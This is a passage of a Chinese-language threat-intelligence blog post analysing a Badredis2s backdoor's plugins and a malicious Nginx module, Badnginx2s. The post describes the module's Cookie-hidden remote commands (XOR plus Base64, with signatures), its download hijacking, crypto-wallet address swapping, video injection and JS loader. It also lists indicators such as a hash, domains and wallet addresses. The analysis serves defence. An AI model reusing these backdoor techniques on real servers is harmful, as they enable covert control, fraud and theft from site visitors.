<p>&#x6700;&#x540E;&#x770B;&#x4E00;&#x4E0B;Plugin&#xFF0C;Badredis2s&#x4E2D;0x12&#x6307;&#x4EE4;&#x548C;&#x63D2;&#x4EF6;&#x64CD;&#x4F5C;&#x76F8;&#x5173;&#x3002;&#x6211;&#x4EEC;&#x5728;&#x6307;&#x4EE4;&#x8DDF;&#x8E2A;&#x7CFB;&#x7EDF;&#x4E2D;&#x5B9E;&#x73B0;&#x4E86;Badredis2s&#x7684;&#x7F51;&#x7EDC;&#x534F;&#x8BAE;&#x540E;&#xFF0C;&#x6210;&#x529F;&#x8DDF;&#x8E2A;&#x5230;0x12&#x53F7;&#x6307;&#x4EE4;&#xFF0C;&#x6355;&#x83B7;shell, filemanager&#x4FE9;&#x4E2A;&#x63D2;&#x4EF6;&#x3002;&#x6BCF;&#x4E2A;&#x63D2;&#x4EF6;&#x90FD;&#x6709;&#x81EA;&#x5DF1;&#x4E13;&#x5C5E;&#x7684;Request-URI&#xFF1A;shell&#x4F7F;&#x7528;&#x7684;&#x662F;/index/sl.html&#xFF1B;filemanager&#x4F7F;&#x7528;&#x7684;&#x662F;/index/fm.html&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2026/01/ring_cmd12.jpg" alt="ring_cmd12.jpg" loading="lazy"><br>
&#x5728;&#x5206;&#x6790;filemanager&#x63D2;&#x4EF6;&#x65F6;&#xFF0C;&#x53C8;&#x53D1;&#x73B0;&#x4E86;&#x4EE5;&#x4E0B;3&#x4E2A;&#x65B0;&#x63D2;&#x4EF6;&#x3002;&#x7A0D;&#x52A0;&#x89C2;&#x5BDF;&#xFF0C;&#x4E0D;&#x96BE;&#x53D1;&#x73B0;&#x63D2;&#x4EF6;&#x540D;&#x4E0E;&#x8DEF;&#x5F84;&#x5B58;&#x5728;&#x4E00;&#x5B9A;&#x7684;&#x5173;&#x8054;&#xFF0C;&#x6211;&#x4EEC;&#x5C1D;&#x8BD5;&#x5BF9;&#x8DEF;&#x5F84;&#x8FDB;&#x884C;&#x7206;&#x7834;&#xFF0C;&#x786E;&#x5B9E;&#x53D1;&#x73B0;&#x4E86;&#x4E00;&#x4E2A;&#x65B0;&#x7684;URI /index/ao.html&#xFF0C;&#x53EF;&#x60DC;&#x6CA1;&#x80FD;&#x53CD;&#x63A8;&#x51FA;&#x5B83;&#x4EE3;&#x8868;&#x7684;&#x63D2;&#x4EF6;&#x540D;&#xFF0C;&#x672A;&#x80FD;&#x6355;&#x83B7;&#x8BE5;&#x63D2;&#x4EF6;&#x3002;</p>
<table>
<thead>
<tr>
<th>Plugin Name</th>
<th>Request-URI</th>
</tr>
</thead>
<tbody>
<tr>
<td>filesearch</td>
<td>/index/fs.html</td>
</tr>
<tr>
<td>filetransport</td>
<td>/index/ft.html</td>
</tr>
<tr>
<td>filedownloader</td>
<td>/index/fd.html</td>
</tr>
</tbody>
</table>
<p>&#x5173;&#x4E8E;&#x63D2;&#x4EF6;&#x7684;&#x529F;&#x80FD;&#xFF0C;&#x5176;&#x540D;&#x79F0;&#x672C;&#x8EAB;&#x4FBF;&#x5DF2;&#x4F53;&#x73B0;&#x6838;&#x5FC3;&#x7528;&#x9014;&#xFF1A;&#x4F8B;&#x5982; shell &#x7528;&#x4E8E;&#x6267;&#x884C; Shell &#x547D;&#x4EE4;&#xFF0C;filemanager &#x8D1F;&#x8D23;&#x6587;&#x4EF6;&#x7BA1;&#x7406;&#x3002;&#x8FD9;&#x79CD;&#x63D2;&#x4EF6;&#x4F53;&#x7CFB;&#x663E;&#x8457;&#x589E;&#x5F3A;&#x4E86; Badredis2s &#x7684;&#x7075;&#x6D3B;&#x6027;&#xFF0C;&#x653B;&#x51FB;&#x8005;&#x53EA;&#x9700;&#x4E0B;&#x53D1;&#x4E0D;&#x540C;&#x529F;&#x80FD;&#x7684;&#x63D2;&#x4EF6;&#xFF0C;&#x5373;&#x53EF;&#x8F7B;&#x677E;&#x5B9E;&#x73B0;&#x5404;&#x7C7B;&#x590D;&#x6742;&#x4EFB;&#x52A1;&#x3002;&#x7531;&#x4E8E;&#x8FD9;&#x4E9B;&#x63D2;&#x4EF6;&#x5747;&#x672A;&#x7ECF;&#x8FC7;&#x4EE3;&#x7801;&#x6DF7;&#x6DC6;&#x6216;&#x53BB;&#x7B26;&#x53F7;&#x5904;&#x7406;&#xFF0C;&#x5206;&#x6790;&#x8D77;&#x6765;&#x5E76;&#x65E0;&#x592A;&#x5927;&#x96BE;&#x5EA6;&#xFF0C;&#x5BF9;&#x5B9E;&#x73B0;&#x7EC6;&#x8282;&#x611F;&#x5174;&#x8DA3;&#x7684;&#x8BFB;&#x8005;&#x53EF;&#x81EA;&#x884C;&#x6DF1;&#x5165;&#x7814;&#x7A76;&#xFF0C;&#x672C;&#x6587;&#x4E0D;&#x518D;&#x5C55;&#x5F00;&#x8BBA;&#x8FF0;&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2026/02/ring_plugins.png" alt="ring_plugins.png" loading="lazy"></p>
<h2 id="0x4-moduleso">0x4: module.so</h2>
<p>module.so&#x662F;&#x4E00;&#x4E2A;&#x6076;&#x610F;&#x7684;Nginx&#x8FC7;&#x6EE4;&#x6A21;&#x5757;&#xFF0C;&#x6211;&#x4EEC;&#x5C06;&#x5B83;&#x547D;&#x540D;&#x4E3A;Badnginx2s&#xFF0C;&#x5B83;&#x7684;&#x57FA;&#x672C;&#x4FE1;&#x606F;&#x5982;&#x4E0B;&#x6240;&#x793A;&#xFF1A;</p>
<pre><code>MD5: 563f5e605ebf1db8065fd41799e71bf9
MAGIC: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, not stripped
Packer: None
</code></pre>
<p>Badnginx2s&#x662F;&#x4E00;&#x79CD;&#x8F83;&#x4E3A;&#x7F55;&#x89C1;&#x7684;&#x9488;&#x5BF9;Nginx&#x540E;&#x95E8;&#x6728;&#x9A6C;&#xFF0C;&#x5176;&#x672C;&#x8D28;&#x662F;&#x4E00;&#x4E2A;Nginx&#x6A21;&#x5757;&#xFF0C;&#x5B83;&#x901A;&#x8FC7;&#x5728;Web&#x670D;&#x52A1;&#x5668;&#x5C42;&#x9762;&#x690D;&#x5165;&#x6076;&#x610F;&#x8FC7;&#x6EE4;&#x5668;&#xFF0C;&#x5BF9;&#x6D41;&#x51FA;&#x6D41;&#x91CF;&#x8FDB;&#x884C;&#x6DF1;&#x5EA6;&#x7BE1;&#x6539;&#x4E0E;&#x653B;&#x51FB;&#xFF0C;&#x4E3B;&#x8981;&#x529F;&#x80FD;&#x5305;&#x62EC;&#xFF1A;</p>
<ol>
<li><strong>&#x8FDC;&#x7A0B;&#x547D;&#x4EE4;&#x6267;&#x884C;</strong>&#xFF1A;&#x540E;&#x95E8;&#x9884;&#x7559;&#x4E86;&#x9690;&#x853D;&#x7684;&#x547D;&#x4EE4;&#x901A;&#x9053;&#xFF0C;&#x5141;&#x8BB8;&#x8FDC;&#x7A0B;&#x547D;&#x4EE4;&#x6267;&#x884C;</li>
<li><strong>&#x4E0B;&#x8F7D;&#x52AB;&#x6301;</strong>&#xFF1A;&#x5F53;&#x7528;&#x6237;&#x4ECE;&#x53D7;&#x611F;&#x67D3;&#x7F51;&#x7AD9;&#x4E0B;&#x8F7D;&#x7279;&#x5B9A;&#x7C7B;&#x578B;&#x7684;&#x6587;&#x4EF6;&#x65F6;&#xFF0C;&#x6728;&#x9A6C;&#x4F1A;&#x6697;&#x4E2D;&#x66FF;&#x6362;&#x4E0B;&#x8F7D;&#x94FE;&#x63A5;</li>
<li><strong>&#x4EE3;&#x7801;&#x6CE8;&#x5165;</strong>&#xFF1A;&#x5411;&#x7F51;&#x9875;&#x6CE8;&#x5165;&#x6076;&#x610F;JavaScript&#x4EE3;&#x7801;&#xFF0C;&#x5C06;&#x8BBF;&#x95EE;&#x7528;&#x6237;&#x91CD;&#x5B9A;&#x5411;&#x81F3;&#x535A;&#x5F69;&#x3001;&#x8272;&#x60C5;&#x7B49;&#x4E0D;&#x826F;&#x7F51;&#x7AD9;&#xFF0C;&#x975E;&#x6CD5;&#x83B7;&#x53D6;&#x6D41;&#x91CF;&#x6216;&#x5B9E;&#x65BD;&#x8FDB;&#x4E00;&#x6B65;&#x8BC8;&#x9A97;&#x3002;</li>
<li><strong>&#x89C6;&#x9891;&#x63D2;&#x64AD;</strong>&#xFF1A;&#x5411;M3U8&#x64AD;&#x653E;&#x5217;&#x8868;&#x6587;&#x4EF6;&#x63D2;&#x5165;&#x65F6;&#x957F;&#x4E3A;5&#x79D2;&#x7684;&#x6076;&#x610F;&#x5A92;&#x4F53;&#x7247;&#x6BB5;&#x6761;&#x76EE;&#xFF0C;&#x7528;&#x4E8E;&#x6D41;&#x5A92;&#x4F53;&#x5185;&#x5BB9;&#x52AB;&#x6301;&#x6216;&#x5E7F;&#x544A;&#x6CE8;&#x5165;</li>
<li><strong>&#x6570;&#x5B57;&#x8D44;&#x4EA7;&#x7A83;&#x53D6;</strong>&#xFF1A;&#x653B;&#x51FB;&#x8005;&#x4EE5;&#x5C06;&#x81EA;&#x5DF1;&#x7684;&#x6536;&#x6B3E;&#x5730;&#x5740;&#x66FF;&#x6362;&#x7F51;&#x9875;&#x4E2D;&#x7684;&#x6570;&#x5B57;&#x8D27;&#x5E01;&#x94B1;&#x5305;&#x5730;&#x5740;&#xFF0C;&#x4ECE;&#x800C;&#x5728;&#x7528;&#x6237;&#x8F6C;&#x8D26;&#x65F6;&#x76F4;&#x63A5;&#x622A;&#x7559;&#x8D44;&#x91D1;&#xFF0C;&#x6784;&#x6210;&#x9690;&#x853D;&#x7684;&#x91D1;&#x878D;&#x76D7;&#x7A83;&#x3002;</li>
</ol>
<p>Badnginx2s&#x901A;&#x8FC7;&#x6CE8;&#x518C;&#x4FE9;&#x4E2A;HTTP&#x8FC7;&#x6EE4;&#x5668;&#x51FD;&#x6570;&#xFF1A;ngx_http_hello_header_filter&#xFF0C;ngx_http_hello_body_filter&#x5B9E;&#x73B0;&#x4E0A;&#x8FF0;&#x529F;&#x80FD;&#x3002;&#x5176;&#x4E2D;header_filter&#x8D1F;&#x8D23;&#x5904;&#x7406; HTTP &#x54CD;&#x5E94;&#x5934;&#x9636;&#x6BB5;&#xFF0C;&#x4E3B;&#x8981;&#x5B8C;&#x6210;&#x8FDC;&#x7A0B;&#x547D;&#x4EE4;&#x6267;&#x884C;&#x3001;&#x7B56;&#x7565;&#x66F4;&#x65B0;&#x3001;&#x4E0B;&#x8F7D;&#x52AB;&#x6301;&#x3001;&#x4EE5;&#x53CA;&#x6807;&#x8BB0;&#x9700;&#x8981;&#x6CE8;&#x5165;&#x6076;&#x610F;&#x4EE3;&#x7801;&#x7684;&#x7279;&#x5B9A;&#x7F51;&#x9875;&#x7B49;&#x6838;&#x5FC3;&#x63A7;&#x5236;&#x4EFB;&#x52A1;&#xFF1B;body_filter&#x8D1F;&#x8D23;&#x5904;&#x7406; HTTP &#x54CD;&#x5E94;&#x4F53;&#x9636;&#x6BB5;&#xFF0C;&#x4E3B;&#x8981;&#x7528;&#x4E8E;&#x5411;&#x9875;&#x9762;&#x6CE8;&#x5165;&#x6076;&#x610F; JavaScript &#x4EE3;&#x7801;&#xFF0C;&#x4EE5;&#x53CA;&#x5B9E;&#x73B0;&#x94B1;&#x5305;&#x5730;&#x5740;&#x7BE1;&#x6539;&#x7B49;&#x5BA2;&#x6237;&#x7AEF;&#x4FA7;&#x653B;&#x51FB;&#x884C;&#x4E3A;&#x3002;&#x8FD9;&#x79CD;&#x8BBE;&#x8BA1;&#x4F7F;&#x5F97; Badnginx2s &#x80FD;&#x591F;&#x5728;&#x54CD;&#x5E94;&#x751F;&#x6210;&#x7684;&#x4E0D;&#x540C;&#x9636;&#x6BB5;&#x7075;&#x6D3B;&#x6267;&#x884C;&#x9690;&#x853D;&#x4E14;&#x7CBE;&#x51C6;&#x7684;&#x6076;&#x610F;&#x64CD;&#x4F5C;&#xFF0C;&#x65E2;&#x80FD;&#x5B9E;&#x73B0;&#x670D;&#x52A1;&#x5668;&#x7AEF;&#x7684;&#x8FDC;&#x7A0B;&#x63A7;&#x5236;&#xFF0C;&#x53C8;&#x80FD;&#x5B8C;&#x6210;&#x5BA2;&#x6237;&#x7AEF;&#x4FA7;&#x7684;&#x7A83;&#x53D6;&#x4E0E;&#x6B3A;&#x8BC8;&#x3002;</p>
<h4 id="%E2%91%A0-%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C">&#x2460; &#x8FDC;&#x7A0B;&#x547D;&#x4EE4;&#x6267;&#x884C;</h4>
<p>&#x653B;&#x51FB;&#x8005;&#x5C06;&#x8FDC;&#x7A0B;&#x547D;&#x4EE4;&#x9690;&#x85CF;&#x5728;HTTP&#x8BF7;&#x6C42;&#x5934;&#x7684;Cookie&#x5B57;&#x6BB5;&#x4E2D;&#xFF0C;&#x4EE5;&#x6B64;&#x5B9E;&#x73B0;&#x9690;&#x853D;&#x901A;&#x4FE1;&#x3002;&#x5176;&#x4E2D;&#xFF0C;comm&#x5B57;&#x6BB5;&#x5B58;&#x50A8;&#x52A0;&#x5BC6;&#x540E;&#x7684;&#x547D;&#x4EE4;&#xFF0C;&#x5176;&#x539F;&#x59CB;&#x683C;&#x5F0F;&#x4E3A;&#x201C;&#x65F6;&#x95F4;&#x6233;$$&#x6307;&#x4EE4;&#x201D;&#xFF0C;&#x4F8B;&#x5982;1768813387$$whoami&#xFF0C;&#x8BE5;&#x5185;&#x5BB9;&#x5148;&#x7ECF;&#x8FC7;<strong>&#x5BC6;&#x94A5;0x5A&#x7684;XOR&#x5F02;&#x6216;&#x52A0;&#x5BC6;</strong>&#xFF0C;&#x518D;&#x7ECF;<strong>Base64&#x7F16;&#x7801;</strong>&#x540E;&#x4F20;&#x8F93;&#xFF1B;sign&#x5B57;&#x6BB5;&#x5219;&#x5B58;&#x50A8;base64&#x7F16;&#x7801;&#x540E;&#x7684;&#x57FA;&#x4E8E;P-256&#x692D;&#x5706;&#x66F2;&#x7EBF;&#x751F;&#x6210;&#x7684;&#x6570;&#x5B57;&#x7B7E;&#x540D;&#xFF0C;Badnginx2s&#x901A;&#x8FC7;&#x516C;&#x94A5;&#x6821;&#x9A8C;&#x7B7E;&#x540D;&#x7684;&#x6709;&#x6548;&#x6027;&#xFF0C;&#x786E;&#x4FDD;&#x6307;&#x4EE4;&#x7684;&#x5B8C;&#x6574;&#x6027;&#x4E0E;&#x6765;&#x6E90;&#x53EF;&#x4FE1;&#x3002;&#x8FD9;&#x79CD;&#x673A;&#x5236;&#x4F7F;&#x653B;&#x51FB;&#x8005;&#x80FD;&#x591F;&#x5728;&#x770B;&#x4F3C;&#x6B63;&#x5E38;&#x7684;HTTP&#x8BF7;&#x6C42;&#x4E2D;&#x9690;&#x853D;&#x6267;&#x884C;&#x8FDC;&#x7A0B;&#x547D;&#x4EE4;&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2026/02/ring_execcmd.png" alt="ring_execcmd.png" loading="lazy"></p>
<h4 id="%E2%91%A1-%E7%AD%96%E7%95%A5%E6%93%8D%E7%BA%B5">&#x2461; &#x7B56;&#x7565;&#x64CD;&#x7EB5;</h4>
<p>Badnginx2s &#x5728;&#x8FD0;&#x884C;&#x65F6;&#x52A8;&#x6001;&#x751F;&#x6210;&#x52AB;&#x6301;&#x914D;&#x7F6E;&#xFF0C;&#x5305;&#x542B;&#x91CD;&#x5B9A;&#x5411;&#x57DF;&#x540D;&#x3001;&#x6076;&#x610F; JS &#x8F7D;&#x8377;&#x5730;&#x5740;&#x3001;&#x767D;&#x540D;&#x5355;&#x7F51;&#x6BB5;&#x7B49;&#x7B56;&#x7565;&#x3002;&#x4E3A;&#x5B9E;&#x73B0;&#x5BF9;&#x914D;&#x7F6E;&#x7684;&#x8FDC;&#x7A0B;&#x5B9E;&#x65F6;&#x8C03;&#x63A7;&#xFF0C;&#x653B;&#x51FB;&#x8005;&#x901A;&#x8FC7; Cookie &#x5EFA;&#x7ACB;&#x9690;&#x853D;&#x7BA1;&#x7406;&#x901A;&#x9053;&#xFF1A;&#x914D;&#x7F6E;&#x64CD;&#x4F5C;&#x6307;&#x4EE4;&#x7ECF;&#x52A0;&#x5BC6;&#x540E;&#x5B58;&#x653E;&#x5728; conf &#x5B57;&#x6BB5;&#xFF0C;&#x5176;&#x52A0;&#x5BC6;&#x65B9;&#x5F0F;&#x4E0E;&#x4E0A;&#x6587; comm &#x5B57;&#x6BB5;&#x76F8;&#x540C;&#xFF08;XOR+Base64&#xFF09;&#xFF1B;&#x6570;&#x5B57;&#x7B7E;&#x540D;&#x5219;&#x5B58;&#x653E;&#x4E8E; sign &#x5B57;&#x6BB5;&#xFF0C;&#x4ECD;&#x91C7;&#x7528; P-256 &#x692D;&#x5706;&#x66F2;&#x7EBF;&#x7B97;&#x6CD5;&#x8FDB;&#x884C;&#x6821;&#x9A8C;&#x3002;&#x901A;&#x8FC7;&#x8BE5;&#x673A;&#x5236;&#xFF0C;&#x653B;&#x51FB;&#x8005;&#x53EF;&#x8FDC;&#x7A0B;&#x9690;&#x853D;&#x6267;&#x884C;&#x914D;&#x7F6E;&#x7684;&#x67E5;&#x8BE2;&#x548C;&#x66F4;&#x65B0;&#xFF0C;&#x4ECE;&#x800C;&#x7075;&#x6D3B;&#x5B9E;&#x65BD;&#x7CBE;&#x51C6;&#x653B;&#x51FB;&#x3002;</p>
<p>&#x4EE5;&#x67E5;&#x8BE2;&#x5F53;&#x524D;&#x914D;&#x7F6E;&#x4E3A;&#x4F8B;&#xFF0C;&#x539F;&#x59CB;&#x547D;&#x4EE4;&#x4E3A;<code>get$$</code>&#xFF0C;&#x5B83;&#x7ECF;&#x4E0A;&#x8FF0;&#x52A0;&#x5BC6;&#x6D41;&#x7A0B;&#x5904;&#x7406;&#x540E;&#xFF0C;&#x6784;&#x6210;Cookie&#x4E2D;&#x7684;conf&#x5B57;&#x6BB5;&#xFF1B;&#x670D;&#x52A1;&#x5668;&#x6536;&#x5230;&#x8FD9;&#x4E2A;&#x8BF7;&#x6C42;&#x540E;&#xFF0C;&#x5F53;sign&#x5B57;&#x6BB5;&#x4E2D;&#x7684;&#x7B7E;&#x540D;&#x901A;&#x8FC7;&#x6821;&#x9A8C;&#xFF0C;&#x5C31;&#x8FD4;&#x56DE;&#x5F53;&#x524D;&#x7684;&#x914D;&#x7F6E;&#x3002;&#x653B;&#x51FB;&#x8005;&#x53EF;&#x901A;&#x8FC7;&#x8FD9;&#x79CD;&#x65B9;&#x5F0F;&#x52A8;&#x6001;&#x7684;&#x8C03;&#x6574;&#x91CD;&#x5B9A;&#x5411;&#x57DF;&#x540D;&#xFF0C;&#x6076;&#x610F;JS&#x8F7D;&#x8377;&#x5730;&#x5740;&#x7B49;&#x5185;&#x5BB9;&#x3002;<br>
<img src="https://blog.xlab.qianxin.com/content/images/2026/02/ring_getconf.png" alt="ring_getconf.png" loading="lazy"></p>
<h4 id="%E2%91%A2-%E4%B8%8B%E8%BD%BD%E5%8A%AB%E6%8C%81">&#x2462; &#x4E0B;&#x8F7D;&#x52AB;&#x6301;</h4>
<p>&#x5F53;&#x7F51;&#x7EDC;&#x8BF7;&#x6C42; APK&#x3001;PLIST &#x6216; MOBILECONFIG &#x8FD9;&#x4E09;&#x79CD;&#x7279;&#x5B9A;&#x8D44;&#x6E90;&#x65F6;&#xFF0C;Badnginx2s &#x4F1A;&#x5B9E;&#x65BD;&#x4E0B;&#x8F7D;&#x52AB;&#x6301;&#x3002;&#x5B83;&#x901A;&#x8FC7; <code>https://%s.aqyaqua.com</code> &#x8FD9;&#x4E00;&#x683C;&#x5F0F;&#x52A8;&#x6001;&#x6784;&#x9020;&#x57DF;&#x540D;&#xFF0C;&#x5E76;&#x8FD4;&#x56DE;&#x5BF9;&#x5E94;&#x7684;&#x6076;&#x610F;&#x8F7D;&#x8377;&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2026/02/ring_dlhijack.png" alt="ring_dlhijack.png" loading="lazy"></p>
<p>&#x503C;&#x5F97;&#x6CE8;&#x610F;&#x7684;&#x662F;&#xFF0C;aqyaqua.com &#x672C;&#x8EAB;&#x4EC5;&#x4F5C;&#x4E3A;&#x4E00;&#x4E2A;&#x6D41;&#x91CF;&#x5165;&#x53E3;&#xFF0C;&#x4F1A;&#x5C06;&#x4E0D;&#x540C;&#x8D44;&#x6E90;&#x7C7B;&#x578B;&#x7684;&#x8BF7;&#x6C42;&#x8F6C;&#x53D1;&#x81F3;&#x4E0D;&#x540C;&#x7684;&#x76EE;&#x6807;&#x5730;&#x5740;&#x3002;&#x76EE;&#x524D;&#xFF0C;&#x53EA;&#x6709;&#x9488;&#x5BF9; APK &#x7684;&#x8F7D;&#x8377;&#x5904;&#x4E8E;&#x6709;&#x6548;&#x72B6;&#x6001;&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2026/02/ring_b9apk.png" alt="ring_b9apk.png" loading="lazy"></p>
<h4 id="%E2%91%A3-%E9%A1%B5%E9%9D%A2%E7%AF%A1%E6%94%B9">&#x2463;  &#x9875;&#x9762;&#x7BE1;&#x6539;</h4>
<p>Badnginx2s&#x901A;&#x8FC7;ngx_http_hello_body_filter&#x51FD;&#x6570;&#x5B9E;&#x73B0;&#x5728;&#x7F51;&#x9875;&#x7684;&#x7BE1;&#x6539;&#xFF0C;&#x6DB5;&#x76D6;&#x4E86;&#x6570;&#x5B57;&#x94B1;&#x5305;&#x66FF;&#x6362;&#xFF0C;&#x89C6;&#x9891;&#x63D2;&#x64AD;&#xFF0C;&#x6076;&#x610F;JS&#x6CE8;&#x5165;&#x3002;</p>
<ul>
<li>&#x6570;&#x5B57;&#x94B1;&#x5305;&#x66FF;&#x6362;</li>
</ul>
<p>&#x5F53;&#x7F51;&#x9875;&#x5185;&#x5BB9;&#x4E2D;&#x51FA;&#x73B0;&#x4EE5;&#x592A;&#x574A;&#x6216;&#x6CE2;&#x573A;&#x94B1;&#x5305;&#x5730;&#x5740;&#x65F6;&#xFF0C;&#x5C06;&#x5176;&#x66FF;&#x6362;&#x4E3A;&#x6307;&#x5B9A;&#x7684;&#x653B;&#x51FB;&#x8005;&#x5730;&#x5740;&#xFF1A;&#x4F8B;&#x5982;&#xFF0C;&#x5C06;&#x4EE5;&#x592A;&#x574A;&#x5730;&#x5740;&#x66FF;&#x6362;&#x4E3A; 0xAA3Bd92445a2E1fE38C7693d77259BeD42a144c3&#xFF0C;&#x6216;&#x5C06;&#x6CE2;&#x573A;&#x5730;&#x5740;&#x66FF;&#x6362;&#x4E3A; TCMCY9ccNmQGfUNHTNtCByCof3VdQnip2b&#x3002;&#x5982;&#x6B64;&#x4E00;&#x6765;&#x5C31;&#x5728;&#x7528;&#x6237;&#x5B8C;&#x5168;&#x65E0;&#x611F;&#x77E5;&#x7684;&#x60C5;&#x51B5;&#x4E0B;&#x5B9E;&#x73B0;&#x4E86;&#x5BF9;&#x4EA4;&#x6613;&#x7684;&#x7A83;&#x53D6;&#xFF0C;&#x7528;&#x6237;&#x4EE5;&#x4E3A;&#x7684;&#x6B63;&#x5E38;&#x8F6C;&#x8D26;&#xFF0C;&#x5374;&#x5728;&#x201C;&#x795E;&#x4E0D;&#x77E5;&#x9B3C;&#x4E0D;&#x89C9;&#x201D;&#x4E2D;&#x6D41;&#x5165;&#x4E86;&#x653B;&#x51FB;&#x8005;&#x7684;&#x53E3;&#x888B;&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2026/02/ring_cryptoaddr.png" alt="ring_cryptoaddr.png" loading="lazy"></p>
<ul>
<li>&#x89C6;&#x9891;&#x63D2;&#x64AD;</li>
</ul>
<p>&#x5F53;&#x7F51;&#x9875;&#x548C;HLS&#x76F4;&#x64AD;&#x6D41;&#x76F8;&#x5173;&#x65F6;&#xFF0C;&#x653B;&#x51FB;&#x8005;&#x53EF;&#x7BE1;&#x6539;M3U8&#x64AD;&#x653E;&#x5217;&#x8868;&#x6587;&#x4EF6;&#xFF0C;&#x63D2;&#x5165;&#x81EA;&#x5B9A;&#x4E49;&#x89C6;&#x9891;&#x6D41;&#x3002;&#x6211;&#x4EEC;&#x76EE;&#x524D;&#x5DF2;&#x6355;&#x83B7;&#x5230;&#x4E00;&#x6B21;&#x6B64;&#x7C7B;&#x653B;&#x51FB;&#x884C;&#x4E3A;&#xFF0C;&#x653B;&#x51FB;&#x8005;&#x63D2;&#x5165;&#x4E86;&#x4E00;&#x4E2A;&#x65F6;&#x957F;5&#x79D2;&#x3001;&#x540D;&#x4E3A;<strong>&#x5E7F;&#x544A;_1.ts</strong>&#x7684;&#x89C6;&#x9891;&#x6D41;&#x7247;&#x6BB5;&#x3002;&#x8BE5;&#x653B;&#x51FB;&#x8868;&#x9762;&#x770B;&#x4F3C;&#x4EC5;&#x4E3A;&#x5E7F;&#x544A;&#x63D2;&#x64AD;&#xFF0C;&#x4F46;&#x5176;&#x6F5C;&#x5728;&#x5371;&#x5BB3;&#x8FDC;&#x4E0D;&#x6B62;&#x4E8E;&#x6B64;&#x2014;&#x2014;&#x653B;&#x51FB;&#x8005;&#x53EF;&#x8F7B;&#x6613;&#x5C06;&#x63D2;&#x5165;&#x5185;&#x5BB9;&#x66FF;&#x6362;&#x4E3A;&#x8272;&#x60C5;&#x3001;&#x66B4;&#x529B;&#x7B49;&#x4E0D;&#x826F;&#x4FE1;&#x606F;&#xFF0C;&#x751A;&#x81F3;&#x5229;&#x7528;&#x76EE;&#x524D;&#x9AD8;&#x5EA6;&#x903C;&#x771F;&#x7684;AI&#x751F;&#x6210;&#x6280;&#x672F;&#xFF0C;&#x4F2A;&#x9020;&#x653F;&#x6CBB;&#x5BA3;&#x4F20;&#x3001;&#x865A;&#x5047;&#x65B0;&#x95FB;&#x6216;&#x5F15;&#x5BFC;&#x6027;&#x6781;&#x5F3A;&#x7684;&#x6DF1;&#x5EA6;&#x4F2A;&#x9020;&#x89C6;&#x9891;&#x3002;&#x8FD9;&#x7C7B;&#x653B;&#x51FB;&#x4E0D;&#x4EC5;&#x7834;&#x574F;&#x7528;&#x6237;&#x4F53;&#x9A8C;&#xFF0C;&#x66F4;&#x53EF;&#x80FD;&#x88AB;&#x7528;&#x4E8E;&#x610F;&#x8BC6;&#x5F62;&#x6001;&#x6E17;&#x900F;&#x3001;&#x793E;&#x4F1A;&#x8206;&#x8BBA;&#x64CD;&#x7EB5;&#x4E0E;&#x516C;&#x5171;&#x79E9;&#x5E8F;&#x5E72;&#x6270;&#xFF0C;&#x5C5E;&#x4E8E;&#x5177;&#x5907;&#x9AD8;&#x6269;&#x6563;&#x6027;&#x3001;&#x5F3A;&#x8BEF;&#x5BFC;&#x6027;&#x4E0E;&#x793E;&#x4F1A;&#x5371;&#x5BB3;&#x6027;&#x7684;&#x65B0;&#x578B;&#x7F51;&#x7EDC;&#x653B;&#x51FB;&#x8F7D;&#x4F53;&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2026/02/ring_video.png" alt="ring_video.png" loading="lazy"></p>
<ul>
<li>&#x6076;&#x610F;JS&#x6CE8;&#x5165;</li>
</ul>
<p>&#x5F53;&#x7F51;&#x9875;&#x4E3A;html&#x7C7B;&#x578B;&#x65F6;&#xFF0C;&#x6309;&#x4F18;&#x5148;&#x7EA7;&#x987A;&#x5E8F;&#x641C;&#x7D22;&lt;head&gt;&#xFF0C;&lt;/title&gt;&#xFF0C;&lt;html&gt;&#xFF0C;&lt;meta&#xFF0C;&lt;script&#x7B49;&#x6807;&#x7B7E;&#xFF0C;&#x9009;&#x62E9;&#x7B2C;&#x4E00;&#x4E2A;&#x5339;&#x914D;&#x7684;&#x4F4D;&#x7F6E;&#x6CE8;&#x5165;&#x6076;&#x610F;JavaScript&#x4EE3;&#x7801;&#x3002;&#x6076;&#x610F;js&#x4EE3;&#x7801;&#x6709;&#x4E00;&#x4E2A;&#x56FA;&#x5B9A;&#x7684;&#x6A21;&#x677F;&#xFF0C;&#x60F3;&#x5FC5;&#x8BFB;&#x8005;&#x5DF2;&#x7ECF;&#x975E;&#x5E38;&#x719F;&#x6089;&#x4E86;&#xFF0C;&#x5B83;&#x548C;&#x4E00;&#x4E2A;Base64&#x5B57;&#x4E32;&#x62FC;&#x63A5;&#x540E;&#xFF0C;&#x6B63;&#x662F;&#x524D;&#x6587;&#x5206;&#x6790;&#x8FC7;&#x7684;JS LOADER&#x3002;&#x6837;&#x672C;&#x4E2D;&#x786C;&#x7F16;&#x7801;&#x7684;Base64&#x5B57;&#x4E32;&#x4E3A;<code>aHR0cHM6Ly9jZG5qcy5qc2RjbGl2ci5jb20vbnBtL2Jvb3RzdHJhcEA1LjMuMC9kaXN0L2Nzcy9ib290c3RyYXAubWluLmNzcz92PTMuNy44LjI=</code>&#xFF0C;&#x89E3;&#x7801;&#x540E;&#x5BF9;&#x5E94;URL&#x4E3A;<code>https://cdnjs[.]jsdclivr[.]com/npm/bootstrap@5.3.0/dist/css/bootstrap.min.css?v=3.7.8.2</code>&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2026/02/ring_jstemp.png" alt="ring_jstemp.png" loading="lazy"></p>
<h2 id="0x5-libutilkeybdso">0x5: libutilkeybd.so</h2>
